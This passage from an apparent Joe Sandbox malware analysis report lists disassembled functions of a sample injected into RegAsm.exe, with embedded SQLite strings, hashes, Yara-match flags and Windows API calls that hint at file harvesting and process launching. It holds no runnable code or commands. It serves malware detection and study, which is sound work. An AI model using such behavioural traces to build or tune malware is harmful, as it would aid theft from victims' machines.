                                                                                                                                                                                                • String ID: , c%d$config$content$docsize$id INTEGER PRIMARY KEY$id INTEGER PRIMARY KEY, sz BLOB$id INTEGER PRIMARY KEY, sz BLOB, origin INTEGER$k PRIMARY KEY, v$version
                                                                                                                                                                                                • API String ID: 0-3918257174
                                                                                                                                                                                                • Opcode ID: 1b89c150466eafac2c076d14f87496b73759d5d9a535080dd19444d3fc4ffe5b
                                                                                                                                                                                                • Instruction ID: fe9846d299fa908f5235d93dec90a06311a9b53c32abaf142ddf4985482397f1
                                                                                                                                                                                                • Opcode Fuzzy Hash: 1b89c150466eafac2c076d14f87496b73759d5d9a535080dd19444d3fc4ffe5b
                                                                                                                                                                                                • Instruction Fuzzy Hash: 145124719003119BE700AF24DD85BDBB7A9EB84765F044628FC899B241D736F909CBA1
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B5D8F40 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 177COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %!.15g$%!.20e$%lld$NULL$NULL
                                                                                                                                                                                                • API String ID: 0-2115304644
                                                                                                                                                                                                • Opcode ID: f0bcf32c68412fa1ee37dd0a3567ef71233d048655c39a3fa3778f54ab29b059
                                                                                                                                                                                                • Instruction ID: 1d797fbb47e695a8d10e09cbdcf73a9766c8a2647d9af2cc262a0dcea1e5e829
                                                                                                                                                                                                • Opcode Fuzzy Hash: f0bcf32c68412fa1ee37dd0a3567ef71233d048655c39a3fa3778f54ab29b059
                                                                                                                                                                                                • Instruction Fuzzy Hash: 8C5145799047105BEB01DF289C42AEBB7B5EF95304F048E4DF8D967202E335E94587A2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B4A3420 Relevance: 21.4, APIs: 6, Strings: 6, Instructions: 392COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ATTACH x AS %Q$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                                                                                                                                                                • API String ID: 0-2988319395
                                                                                                                                                                                                • Opcode ID: acd9c4651e3a2edf4b6a59b3cf8f862b640366037497b76802bc61b286b79d88
                                                                                                                                                                                                • Instruction ID: 6cc8f17359c04affe67f28a1228e902adfea884fcf89a1069d1a31e20f0797d8
                                                                                                                                                                                                • Opcode Fuzzy Hash: acd9c4651e3a2edf4b6a59b3cf8f862b640366037497b76802bc61b286b79d88
                                                                                                                                                                                                • Instruction Fuzzy Hash: B9D1B2B49003419BEB108F34DCC5B9A77E8BFA4715F04892CE89A97341F7B5E549CBA2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B52EF60 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 192COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: ,origin
                                                                                                                                                                                                • API String ID: 0-4198660907
                                                                                                                                                                                                • Opcode ID: 5640ac008edb398939e79864a2eea28a8b2a0218eb70ec90ebc6e92bbb6e3774
                                                                                                                                                                                                • Instruction ID: 1319fd2117e04ac59bbb64e22e3d03c211cd0cc67d989766b5400cb7c27cca8f
                                                                                                                                                                                                • Opcode Fuzzy Hash: 5640ac008edb398939e79864a2eea28a8b2a0218eb70ec90ebc6e92bbb6e3774
                                                                                                                                                                                                • Instruction Fuzzy Hash: 6171BFB1504300EFDB11AF58E880A9BBBB5FF98340F944D6CE98687260E733E854DB52
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B574B10 Relevance: 21.2, APIs: 5, Strings: 7, Instructions: 156COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • UNIQUE constraint failed: %s.%s, xrefs: 1B574BC9
                                                                                                                                                                                                • misuse, xrefs: 1B574C34
                                                                                                                                                                                                • API called with finalized prepared statement, xrefs: 1B574C1E
                                                                                                                                                                                                • rtree constraint failed: %s.(%s<=%s), xrefs: 1B574BF9
                                                                                                                                                                                                • SELECT * FROM %Q.%Q, xrefs: 1B574B25
                                                                                                                                                                                                • %s at line %d of [%.10s], xrefs: 1B574C39
                                                                                                                                                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B574C2A
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$API called with finalized prepared statement$SELECT * FROM %Q.%Q$UNIQUE constraint failed: %s.%s$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$rtree constraint failed: %s.(%s<=%s)
                                                                                                                                                                                                • API String ID: 0-2013246442
                                                                                                                                                                                                • Opcode ID: fe2422c0eeb676f56bfd4ac87b61ad8d6aa9e075785fa95ca4230c676291f0d0
                                                                                                                                                                                                • Instruction ID: 8d0041b5dca52238b8112e4faa944a676c0565abc299b14a867d82447594b1e6
                                                                                                                                                                                                • Opcode Fuzzy Hash: fe2422c0eeb676f56bfd4ac87b61ad8d6aa9e075785fa95ca4230c676291f0d0
                                                                                                                                                                                                • Instruction Fuzzy Hash: 7C41F8B1B00215AFFB016F65DC89FEB3BACEFA4615F40492CFD4996201E721E94487B2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B627C10 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 150COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s%c%s$winFullPathname1$winFullPathname2
                                                                                                                                                                                                • API String ID: 0-2846052723
                                                                                                                                                                                                • Opcode ID: f0deb81bf8e90758d0af503148d34d6a153f63d40c7ccd25d4c0e3813338b395
                                                                                                                                                                                                • Instruction ID: 20eb33c573c18f5759bb85da16ce8de0eaca7303382cd8988b704e99271d17d6
                                                                                                                                                                                                • Opcode Fuzzy Hash: f0deb81bf8e90758d0af503148d34d6a153f63d40c7ccd25d4c0e3813338b395
                                                                                                                                                                                                • Instruction Fuzzy Hash: 1241CBE1A053522FFB105630FC82FFB3B999FA5225F4445ADF8CA55240D72AEC06DA62
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B61AAD0 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 130COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$bind on a busy prepared statement: [%s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                                                                                                                                                                • API String ID: 0-3679126755
                                                                                                                                                                                                • Opcode ID: 35d508b1fd29fc548c51e884b8034fed4c14869480faa1c870e500c3ed948e30
                                                                                                                                                                                                • Instruction ID: 855a19b5bed7676a11c6c2119c23024a052b9817b84dd65052f8992255321ef8
                                                                                                                                                                                                • Opcode Fuzzy Hash: 35d508b1fd29fc548c51e884b8034fed4c14869480faa1c870e500c3ed948e30
                                                                                                                                                                                                • Instruction Fuzzy Hash: 5041D4F17007409BEB109F68EC86FDA76E5AFA4316F058528F5A9DF381E760E480C761
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00411CF6 Relevance: 19.7, APIs: 13, Instructions: 186stringCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 00411CFB
                                                                                                                                                                                                • memset.MSVCRT ref: 00411D1C
                                                                                                                                                                                                • memset.MSVCRT ref: 00411D2A
                                                                                                                                                                                                  • Part of subcall function 0040FD0C: SHGetFolderPathA.SHELL32(00000000,{LB,00000000,00000000,?), ref: 0040FD3D
                                                                                                                                                                                                • lstrcat.KERNEL32(?,00000000), ref: 00411D56
                                                                                                                                                                                                • lstrcat.KERNEL32(?), ref: 00411D74
                                                                                                                                                                                                • lstrcat.KERNEL32(?,?), ref: 00411D88
                                                                                                                                                                                                • lstrcat.KERNEL32(?), ref: 00411D9B
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                  • Part of subcall function 0040FCC8: _EH_prolog.MSVCRT ref: 0040FCCD
                                                                                                                                                                                                  • Part of subcall function 0040FCC8: GetFileAttributesA.KERNEL32(00000000,?,0040CB40,?,?,?,?), ref: 0040FCE1
                                                                                                                                                                                                  • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                                                                                                                                  • Part of subcall function 0040B20D: _EH_prolog.MSVCRT ref: 0040B212
                                                                                                                                                                                                  • Part of subcall function 0040B20D: StrStrA.SHLWAPI(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040B265
                                                                                                                                                                                                  • Part of subcall function 0040B20D: memcmp.MSVCRT ref: 0040B2A3
                                                                                                                                                                                                  • Part of subcall function 004061D7: _EH_prolog.MSVCRT ref: 004061DC
                                                                                                                                                                                                  • Part of subcall function 004061D7: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061FF
                                                                                                                                                                                                  • Part of subcall function 004061D7: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406216
                                                                                                                                                                                                  • Part of subcall function 004061D7: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406232
                                                                                                                                                                                                  • Part of subcall function 004061D7: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 0040624C
                                                                                                                                                                                                  • Part of subcall function 004061D7: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 0040626D
                                                                                                                                                                                                  • Part of subcall function 0040FF83: GlobalAlloc.KERNEL32(00000000,00411E29,00000000,00000000,?,00411E29,?,?), ref: 0040FF8E
                                                                                                                                                                                                • StrStrA.SHLWAPI(00000000), ref: 00411E35
                                                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 00411F04
                                                                                                                                                                                                  • Part of subcall function 0040628E: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,EY@,00000000,00000000), ref: 004062AE
                                                                                                                                                                                                  • Part of subcall function 0040628E: LocalAlloc.KERNEL32(00000040,EY@,?,?,00405945,00000000,?,?), ref: 004062BC
                                                                                                                                                                                                  • Part of subcall function 0040628E: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,EY@,00000000,00000000), ref: 004062D2
                                                                                                                                                                                                  • Part of subcall function 0040628E: LocalFree.KERNEL32(00000000,?,?,00405945,00000000,?,?), ref: 004062E1
                                                                                                                                                                                                  • Part of subcall function 004063FD: _EH_prolog.MSVCRT ref: 00406402
                                                                                                                                                                                                  • Part of subcall function 004063FD: memcmp.MSVCRT ref: 00406428
                                                                                                                                                                                                  • Part of subcall function 004063FD: memset.MSVCRT ref: 00406457
                                                                                                                                                                                                  • Part of subcall function 004063FD: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,00000000,00000000), ref: 0040648C
                                                                                                                                                                                                • lstrcat.KERNEL32(?,00000000), ref: 00411EAA
                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?,004254B7,?,?,?,?,000003E8), ref: 00411EC7
                                                                                                                                                                                                • lstrcat.KERNEL32(?,?), ref: 00411EE0
                                                                                                                                                                                                • lstrcat.KERNEL32(?,0042582C), ref: 00411EEE
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: lstrcat$H_prolog$AllocFileLocal$memset$BinaryCryptFreeGlobalStringmemcmp$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 174962345-0
                                                                                                                                                                                                • Opcode ID: 37bfc29a56c593fef6d67d804f7408912f80468a4bbf4b971a8d5b943ce52b75
                                                                                                                                                                                                • Instruction ID: 56ea6d3dff1061707347a20c97a69aacfd6141a5f24feec01e68d33a614e3916
                                                                                                                                                                                                • Opcode Fuzzy Hash: 37bfc29a56c593fef6d67d804f7408912f80468a4bbf4b971a8d5b943ce52b75
                                                                                                                                                                                                • Instruction Fuzzy Hash: 66611EB2D0121DAECF11EBE1DC46DEE7BBDAB19304F00047AF605F3151E6399A588BA5
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B5BECF0 Relevance: 19.6, APIs: 9, Strings: 2, Instructions: 335COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: content$docsize
                                                                                                                                                                                                • API String ID: 0-1024698521
                                                                                                                                                                                                • Opcode ID: 8efad659e46b9c5cb987590d2f3cfeeb7426b8a08abe3c9546018d2a80485d8f
                                                                                                                                                                                                • Instruction ID: a98ed67e83c156204f3873bdbb90849b4f47eaba56223dd6135a5edc71db07db
                                                                                                                                                                                                • Opcode Fuzzy Hash: 8efad659e46b9c5cb987590d2f3cfeeb7426b8a08abe3c9546018d2a80485d8f
                                                                                                                                                                                                • Instruction Fuzzy Hash: 14C10171D04356ABEB11DF24C981BDBB7E6AF84310F054928FD85A7250E372EC89CB92
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 0041174A Relevance: 19.6, APIs: 2, Strings: 9, Instructions: 310COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 0041174F
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: _EH_prolog.MSVCRT ref: 0040EA90
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrlenA.KERNEL32(?,?,?,?,?,0041625D,?,?,00425A60,?,00000000,00425507), ref: 0040EAB8
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcpy.KERNEL32(00000000), ref: 0040EADF
                                                                                                                                                                                                  • Part of subcall function 0040EA8B: lstrcat.KERNEL32(?,?), ref: 0040EAEA
                                                                                                                                                                                                  • Part of subcall function 0040E9D0: lstrcpy.KERNEL32(00000000,?), ref: 0040EA09
                                                                                                                                                                                                  • Part of subcall function 0040FB47: _EH_prolog.MSVCRT ref: 0040FB4C
                                                                                                                                                                                                  • Part of subcall function 0040FB47: GetSystemTime.KERNEL32(?,004253D8,00000000,00000001,00000000,00425502,004254FF), ref: 0040FB8C
                                                                                                                                                                                                  • Part of subcall function 0040EA17: _EH_prolog.MSVCRT ref: 0040EA1C
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcpy.KERNEL32(00000000), ref: 0040EA68
                                                                                                                                                                                                  • Part of subcall function 0040EA17: lstrcat.KERNEL32(?,?), ref: 0040EA72
                                                                                                                                                                                                • ShellExecuteEx.SHELL32(0000003C), ref: 00411B1E
                                                                                                                                                                                                  • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
